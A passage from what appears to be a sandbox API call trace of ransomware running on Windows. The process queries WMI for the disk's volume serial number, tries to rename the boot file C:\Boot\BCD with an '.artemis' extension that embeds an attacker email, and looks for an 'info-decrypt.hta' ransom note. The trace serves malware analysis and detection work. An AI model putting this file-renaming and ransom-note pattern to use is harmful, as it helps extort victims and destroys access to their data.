[5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689efcc | out: ppvObject=0x689efcc*=0x6738700) returned 0x0 [0136.523] WbemDefPath:IUnknown:Release (This=0x6736f48) returned 0x0 [0136.523] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ebec | out: ppvObject=0x689ebec*=0x6738700) returned 0x0 [0136.523] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689eba8 | out: ppvObject=0x689eba8*=0x0) returned 0x80004002 [0136.523] WbemDefPath:IUnknown:AddRef (This=0x6738700) returned 0x3 [0136.523] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e504 | out: ppvObject=0x689e504*=0x0) returned 0x80004002 [0136.523] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e4b4 | out: ppvObject=0x689e4b4*=0x0) returned 0x80004002 [0136.523] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e4c0 | out: ppvObject=0x689e4c0*=0x7ae3a0) returned 0x0 [0136.524] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7ae3a0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e4c8 | out: pCid=0x689e4c8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0136.524] WbemDefPath:IUnknown:Release (This=0x7ae3a0) returned 0x3 [0136.524] CoGetContextToken (in: pToken=0x689e520 | out: pToken=0x689e520) returned 0x0 [0136.524] CoGetContextToken (in: pToken=0x689e928 | out: pToken=0x689e928) returned 0x0 [0136.524] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e9b8 | out: ppvObject=0x689e9b8*=0x0) returned 0x80004002 [0136.524] WbemDefPath:IUnknown:Release (This=0x6738700) returned 0x2 [0136.524] WbemDefPath:IUnknown:Release (This=0x6738700) returned 0x1 [0136.524] CoGetContextToken (in: pToken=0x689f2b0 | out: pToken=0x689f2b0) returned 0x0 [0136.524] CoGetContextToken (in: pToken=0x689f210 | out: pToken=0x689f210) returned 0x0 [0136.524] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738700, riid=0x689f2e0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x689f2dc | out: ppvObject=0x689f2dc*=0x6738700) returned 0x0 [0136.524] WbemDefPath:IUnknown:AddRef (This=0x6738700) returned 0x3 [0136.524] WbemDefPath:IUnknown:Release (This=0x6738700) returned 0x2 [0136.524] WbemDefPath:IWbemPath:SetText (This=0x6738700, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0136.524] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738700, puCount=0x689f460 | out: puCount=0x689f460*=0x2) returned 0x0 [0136.524] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=4, puBuffLength=0x689f45c*=0x0, pszText=0x0 | out: puBuffLength=0x689f45c*=0xf, pszText=0x0) returned 0x0 [0136.524] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=4, puBuffLength=0x689f45c*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f45c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0136.524] CoGetObjectContext (in: riid=0x33a8fd0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f460 | out: ppv=0x689f460*=0x72015c) returned 0x0 [0136.524] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f458 | out: pAptType=0x689f458*=1) returned 0x0 [0136.525] IUnknown:QueryInterface (in: This=0x72015c, riid=0x33a8fb8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f45c | out: ppvObject=0x689f45c*=0x0) returned 0x80004002 [0136.525] IUnknown:Release (This=0x72015c) returned 0x1 [0136.525] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f080 | out: ppv=0x689f080*=0x673edc8) returned 0x0 [0136.525] WbemLocator:IUnknown:QueryInterface (in: This=0x673edc8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689f298 | out: ppvObject=0x689f298*=0x0) returned 0x80004002 [0136.525] WbemLocator:IClassFactory:CreateInstance (in: This=0x673edc8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f2ac | out: ppvObject=0x689f2ac*=0x6736f58) returned 0x0 [0136.525] WbemLocator:IUnknown:Release (This=0x673edc8) returned 0x0 [0136.525] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f58, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689eecc | out: ppvObject=0x689eecc*=0x6736f58) returned 0x0 [0136.525] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f58, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689ee88 | out: ppvObject=0x689ee88*=0x0) returned 0x80004002 [0136.526] WbemLocator:IUnknown:AddRef (This=0x6736f58) returned 0x3 [0136.526] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f58, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e7e4 | out: ppvObject=0x689e7e4*=0x0) returned 0x80004002 [0136.526] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f58, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e794 | out: ppvObject=0x689e794*=0x0) returned 0x80004002 [0136.526] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f58, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e7a0 | out: ppvObject=0x689e7a0*=0x0) returned 0x80004002 [0136.526] CoGetContextToken (in: pToken=0x689e800 | out: pToken=0x689e800) returned 0x0 [0136.526] CoGetContextToken (in: pToken=0x689ec08 | out: pToken=0x689ec08) returned 0x0 [0136.526] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f58, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ec98 | out: ppvObject=0x689ec98*=0x0) returned 0x80004002 [0136.526] WbemLocator:IUnknown:Release (This=0x6736f58) returned 0x2 [0136.526] WbemLocator:IUnknown:Release (This=0x6736f58) returned 0x1 [0136.526] CoGetContextToken (in: pToken=0x689f278 | out: pToken=0x689f278) returned 0x0 [0136.526] CoGetContextToken (in: pToken=0x689f1d8 | out: pToken=0x689f1d8) returned 0x0 [0136.526] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f58, riid=0x689f2a8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x689f2a4 | out: ppvObject=0x689f2a4*=0x6736f58) returned 0x0 [0136.526] WbemLocator:IUnknown:AddRef (This=0x6736f58) returned 0x3 [0136.526] WbemLocator:IUnknown:Release (This=0x6736f58) returned 0x2 [0136.526] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738700, puCount=0x689f43c | out: puCount=0x689f43c*=0x2) returned 0x0 [0136.526] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=8, puBuffLength=0x689f438*=0x0, pszText=0x0 | out: puBuffLength=0x689f438*=0xf, pszText=0x0) returned 0x0 [0136.526] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=8, puBuffLength=0x689f438*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f438*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0136.526] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x689f314 | out: ppv=0x689f314*=0x6736f68) returned 0x0 [0136.526] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736f68, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x689f3a8 | out: ppNamespace=0x689f3a8*=0x673af74) returned 0x0 [0137.036] WbemLocator:IUnknown:QueryInterface (in: This=0x673af74, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f244 | out: ppvObject=0x689f244*=0x780fa4) returned 0x0 [0137.036] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x780fa4, pProxy=0x673af74, pAuthnSvc=0x689f294, pAuthzSvc=0x689f290, pServerPrincName=0x689f288, pAuthnLevel=0x689f28c, pImpLevel=0x689f27c, pAuthInfo=0x689f280, pCapabilites=0x689f284 | out: pAuthnSvc=0x689f294*=0xa, pAuthzSvc=0x689f290*=0x0, pServerPrincName=0x689f288, pAuthnLevel=0x689f28c*=0x6, pImpLevel=0x689f27c*=0x2, pAuthInfo=0x689f280, pCapabilites=0x689f284*=0x1) returned 0x0 [0137.036] WbemLocator:IUnknown:Release (This=0x780fa4) returned 0x1 [0137.036] WbemLocator:IUnknown:QueryInterface (in: This=0x673af74, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f238 | out: ppvObject=0x689f238*=0x780fc4) returned 0x0 [0137.036] WbemLocator:IUnknown:QueryInterface (in: This=0x673af74, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f234 | out: ppvObject=0x689f234*=0x780fa4) returned 0x0 [0137.036] WbemLocator:IClientSecurity:SetBlanket (This=0x780fa4, pProxy=0x673af74, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0137.037] WbemLocator:IUnknown:Release (This=0x780fa4) returned 0x2 [0137.037] WbemLocator:IUnknown:Release (This=0x780fc4) returned 0x1 [0137.037] CoTaskMemFree (pv=0x77de78) [0137.037] WbemLocator:IUnknown:Release (This=0x6736f68) returned 0x0 [0137.037] WbemLocator:IUnknown:QueryInterface (in: This=0x673af74, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ee34 | out: ppvObject=0x689ee34*=0x780fc4) returned 0x0 [0137.037] WbemLocator:IUnknown:QueryInterface (in: This=0x780fc4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689edf0 | out: ppvObject=0x689edf0*=0x0) returned 0x80004002 [0137.038] WbemLocator:IUnknown:QueryInterface (in: This=0x780fc4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689ec0c | out: ppvObject=0x689ec0c*=0x0) returned 0x80004002 [0137.038] WbemLocator:IUnknown:AddRef (This=0x780fc4) returned 0x3 [0137.038] WbemLocator:IUnknown:QueryInterface (in: This=0x780fc4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e74c | out: ppvObject=0x689e74c*=0x0) returned 0x80004002 [0137.038] WbemLocator:IUnknown:QueryInterface (in: This=0x780fc4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e6fc | out: ppvObject=0x689e6fc*=0x0) returned 0x80004002 [0137.038] WbemLocator:IUnknown:QueryInterface (in: This=0x780fc4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e708 | out: ppvObject=0x689e708*=0x780f24) returned 0x0 [0137.039] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x780f24, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e710 | out: pCid=0x689e710*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0137.039] WbemLocator:IUnknown:Release (This=0x780f24) returned 0x3 [0137.039] CoGetContextToken (in: pToken=0x689e768 | out: pToken=0x689e768) returned 0x0 [0137.039] CoGetContextToken (in: pToken=0x689eb70 | out: pToken=0x689eb70) returned 0x0 [0137.039] WbemLocator:IUnknown:QueryInterface (in: This=0x780fc4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ec00 | out: ppvObject=0x689ec00*=0x780fac) returned 0x0 [0137.039] WbemLocator:IRpcOptions:Query (in: This=0x780fac, pPrx=0x780fc4, dwProperty=2, pdwValue=0x689ec28 | out: pdwValue=0x689ec28) returned 0x80004002 [0137.039] WbemLocator:IUnknown:Release (This=0x780fac) returned 0x3 [0137.039] WbemLocator:IUnknown:Release (This=0x780fc4) returned 0x2 [0137.039] CoGetContextToken (in: pToken=0x689f148 | out: pToken=0x689f148) returned 0x0 [0137.039] CoGetContextToken (in: pToken=0x689f0a8 | out: pToken=0x689f0a8) returned 0x0 [0137.039] WbemLocator:IUnknown:QueryInterface (in: This=0x780fc4, riid=0x689f178*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x689f174 | out: ppvObject=0x689f174*=0x673af74) returned 0x0 [0137.039] WbemLocator:IUnknown:AddRef (This=0x673af74) returned 0x4 [0137.039] WbemLocator:IUnknown:Release (This=0x673af74) returned 0x3 [0137.039] WbemLocator:IUnknown:Release (This=0x673af74) returned 0x2 [0137.039] SysStringLen (param_1=0x0) returned 0x0 [0137.039] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738690, puCount=0x689f50c | out: puCount=0x689f50c*=0x0) returned 0x0 [0137.039] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x689f508*=0x0, pszText=0x0 | out: puBuffLength=0x689f508*=0x20, pszText=0x0) returned 0x0 [0137.039] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x689f508*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f508*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0137.039] CoGetContextToken (in: pToken=0x689f178 | out: pToken=0x689f178) returned 0x0 [0137.040] WbemLocator:IUnknown:AddRef (This=0x780fc4) returned 0x3 [0137.040] WbemLocator:IUnknown:QueryInterface (in: This=0x780fc4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f00c | out: ppvObject=0x689f00c*=0x780fc4) returned 0x0 [0137.040] WbemLocator:IUnknown:Release (This=0x780fc4) returned 0x3 [0137.040] WbemLocator:IUnknown:Release (This=0x780fc4) returned 0x2 [0137.040] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x689f510*=0x0, pszText=0x0 | out: puBuffLength=0x689f510*=0x20, pszText=0x0) returned 0x0 [0137.040] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x689f510*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f510*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0137.040] IWbemServices:GetObject (in: This=0x673af74, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x689f4c4*=0x0, ppCallResult=0x0 | out: ppObject=0x689f4c4*=0x673afa0, ppCallResult=0x0) returned 0x0 [0139.278] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738700, puCount=0x689f4c4 | out: puCount=0x689f4c4*=0x2) returned 0x0 [0139.278] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=4, puBuffLength=0x689f4c0*=0x0, pszText=0x0 | out: puBuffLength=0x689f4c0*=0xf, pszText=0x0) returned 0x0 [0139.278] WbemDefPath:IWbemPath:GetText (in: This=0x6738700, lFlags=4, puBuffLength=0x689f4c0*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f4c0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0139.279] IWbemClassObject:Get (in: This=0x673afa0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x689f4c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x33ba188*=0, plFlavor=0x33ba18c*=0 | out: pVal=0x689f4c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x33ba188*=8, plFlavor=0x33ba18c*=0) returned 0x0 [0139.279] SysStringByteLen (bstr="9C354B42") returned 0x10 [0139.279] SysStringByteLen (bstr="9C354B42") returned 0x10 [0139.279] IWbemClassObject:Get (in: This=0x673afa0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x689f4c8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x33ba188*=8, plFlavor=0x33ba18c*=0 | out: pVal=0x689f4c8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x33ba188*=8, plFlavor=0x33ba18c*=0) returned 0x0 [0139.279] SysStringByteLen (bstr="9C354B42") returned 0x10 [0139.279] SysStringByteLen (bstr="9C354B42") returned 0x10 [0139.279] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD", nBufferLength=0x105, lpBuffer=0x689f0c8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD", lpFilePart=0x0) returned 0xb [0139.279] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x689f0c8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x36 [0139.279] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f528) returned 1 [0139.279] GetFileAttributesExW (in: lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), fInfoLevelId=0x0, lpFileInformation=0x689f5a4 | out: lpFileInformation=0x689f5a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x90cd45e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x90cd45e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0139.279] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f524) returned 1 [0139.458] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFile") returned 0x0 [0139.462] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFileW") returned 0x76d59af0 [0139.462] MoveFileW (lpExistingFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), lpNewFileName="C:\\Boot\\BCD.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\boot\\bcd.id-9c354b42.[khalate@tutanota.com].artemis")) returned 0 [0139.519] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG", nBufferLength=0x105, lpBuffer=0x689f16c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG", lpFilePart=0x0) returned 0xf [0139.519] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG", nBufferLength=0x105, lpBuffer=0x689f164, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG", lpFilePart=0x0) returned 0xf [0139.520] GetFullPathNameW (in: lpFileName="C:\\Boot\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x689f16c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\info-decrypt.hta", lpFilePart=0x0) returned 0x18 [0139.520] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f5cc) returned 1 [0139.520] GetFileAttributesExW (in: lpFileName="C:\\Boot\\info-decrypt.hta" (normalized: "c:\\boot\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x689f648 | out: lpFileInformation=0x689f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe1f09e0, ftCreationTime.dwHighDateTime=0x1d6a20a, ftLastAccessTime.dwLowDateTime=0xfe1f09e0, ftLastAccessTime.dwHighDateTime=0x1d6a20a, ftLastWriteTime.dwLowDateTime=0xfe1f09e0, ftLastWriteTime.dwHighDateTime=0x1d6a20a, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0139.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f5c8) returned 1 [0139.520] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG", nBufferLength=0x105, lpBuffer=0x689f0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG", lpFilePart=0x0) returned 0xf [0139.520] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f594) returned 1 [0139.520] GetFileAttributesExW (in: lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), fInfoLevelId=0x0, lpFileInformation=0x33ba7bc | out: lpFileInformation=0x33ba7bc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x9098e7a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5400)) returned 1 [0139.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f590) returned 1 [0139.520] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG", nBufferLength=0x105, lpBuffer=0x689efd4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG", lpFilePart=0x0) returned 0xf [0139.520] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f4c8) returned 1 [0139.520] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0139.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689e300) returned 1 [0139.522] CoTaskMemAlloc (cb=0x20c) returned 0x771a78 [0139.522] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x771a78 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0139.523] CoTaskMemFree (pv=0x771a78) [0139.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x689efa8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0139.524] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f4f0 | out: ppv=0x689f4f0*=0x72015c) returned 0x0 [0139.524] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f4e8 | out: pAptType=0x689f4e8*=1) 